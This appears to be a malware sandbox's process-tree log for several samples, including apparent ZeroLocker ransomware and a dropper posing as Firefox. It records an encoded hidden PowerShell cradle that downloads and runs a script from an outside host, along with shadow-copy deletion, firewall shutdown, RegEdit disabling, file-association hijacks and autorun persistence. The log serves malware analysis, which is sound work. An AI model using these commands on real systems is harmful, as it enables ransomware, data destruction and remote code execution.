"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\" -ad -an -ai#7zMap12901:190:7zEvent28505
PID:14032

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js
- Opens file in notepad (likely ransom note)
PID:14200

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js"
- Checks computer location settings
PID:14304

  C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
  PID:5432

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
    - Command and Scripting Interpreter: PowerShell
    PID:1780

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\" -ad -an -ai#7zMap29832:190:7zEvent3947
PID:7300

C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe
"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe"
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Windows directory
PID:14420

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
- Opens file in notepad (likely ransom note)
PID:14636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ZeroLocker\ZeroRescue.exe
PID:14856

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap6371:190:7zEvent12940
PID:15212

C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe
"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:15308

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C echo ^[autorun^] >autorun.inf
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  PID:5372

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C echo ^open^=KasperskyScan^.exe >>autorun.inf
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  PID:6820

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  PID:7848

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete
  - System Location Discovery: System Language Discovery
  PID:7472

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C taskkill /im taskmgr.exe /f
  - System Location Discovery: System Language Discovery
  PID:22864

    C:\Windows\SysWOW64\taskkill.exe
    taskkill /im taskmgr.exe /f
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:22928

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C assoc .png=NotSoCleverBotFile
  - System Location Discovery: System Language Discovery
  PID:23312

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C assoc .vbs=NotSoCleverBotFile
  - System Location Discovery: System Language Discovery
  PID:23452

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C assoc .html=NotSoCleverBotFile
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:23668

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C assoc .bat=NotSoCleverBotFile
  - System Location Discovery: System Language Discovery
  PID:23860

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C assoc .jpn=EncryptedFile
  - System Location Discovery: System Language Discovery
  PID:24004

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C assoc .js=exe1file
  - System Location Discovery: System Language Discovery
  PID:24200

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
  - System Location Discovery: System Language Discovery
  PID:24316

    C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Disables RegEdit via registry modification
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:24432

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ipconfig /release
  - System Location Discovery: System Language Discovery
  PID:24508

    C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /release
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:24648

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Windows Firewall
  - System Location Discovery: System Language Discovery
  PID:24744

    C:\Windows\SysWOW64\net.exe
    net stop Windows Firewall
    - System Location Discovery: System Language Discovery
    PID:24892

      C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Windows Firewall
      - System Location Discovery: System Language Discovery
      PID:24916

  C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C net stop Network Connections
  - System Location Discovery: System Language Discovery
  PID:25012

    C:\Windows\SysWOW64\net.exe
    net stop Network Connections
    - System Location Discovery: System Language Discovery
    PID:25140

      C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Network Connections
      - System Location Discovery: System Language Discovery
      PID:25180

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap25546:190:7zEvent32505
PID:19608

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap14106:190:7zEvent8523
PID:19724

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\" -ad -an -ai#7zMap16342:190:7zEvent8403
PID:19776

C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe
"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:19832

  C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start %temp%\tmp1.jpg
  - System Location Discovery: System Language Discovery
  PID:19856

    C:\Users\Admin\AppData\Local\Temp\tmp1.jpg
    C:\Users\Admin\AppData\Local\Temp\tmp1.jpg
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:19908

  C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c start %temp%\tmp2.exe
  - System Location Discovery: System Language Discovery
  PID:19928

    C:\Users\Admin\AppData\Local\Temp\tmp2.exe
    C:\Users\Admin\AppData\Local\Temp\tmp2.exe
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    PID:19984

      C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
      "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\tmp2.exe
      - Executes dropped EXE
      - Suspicious behavior: AddClipboardFormatListener
      PID:20104

C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20028
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20180
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20264
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20344
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20424
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20508
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20588
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20668
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20748
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20828
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20912
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20992
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21072
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21152
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21232
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21312
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21392
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21476
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10368
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10452
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10532
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10608
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10692
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:10740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:10772
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:10820
-
-
-
[2] PID 10860  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 21552  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 21584  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 21632  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 21668  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 21716  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 21748  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 21796  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 21828  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 21876  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 21908  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 21956  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 21988  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22036  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22068  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22116  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22148  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22196  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22228  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22276  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22312  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22360  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22404  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22452  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22488  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22540  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22576  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22624  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22656  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22704  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22736  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22788  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22820  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 22920  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 22968  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 23240  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 23272  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 23376  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 23412  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 23496  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 23536  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 23656  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 23712  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 23800  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 23836  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 23928  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 23960  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24048  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24088  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24144  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24180  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24276  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24308  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24408  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24456  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24516  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24580  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24656  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24700  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24812  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24848  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 24924  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 24964  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25020  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 25084  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25148  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 25200  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25252  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 25284  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25340  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
[2] PID 25380  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
    [3] PID 25428  C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe
        - Adds Run key to start application
        - Suspicious behavior: AddClipboardFormatListener
